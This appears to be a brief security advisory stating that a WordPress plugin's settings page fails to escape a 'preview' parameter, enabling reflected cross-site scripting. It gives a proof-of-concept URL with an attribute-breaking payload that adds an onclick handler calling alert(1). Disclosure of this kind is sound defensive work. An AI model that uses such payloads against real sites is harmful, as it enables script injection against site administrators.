The plugin doesn’t escape a parameter on its setting page, making it possible for attackers to conduct reflected cross-site scripting attacks.
https://example.com/wp-admin/admin.php?page=wpo_wcpdf_options_page&preview=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22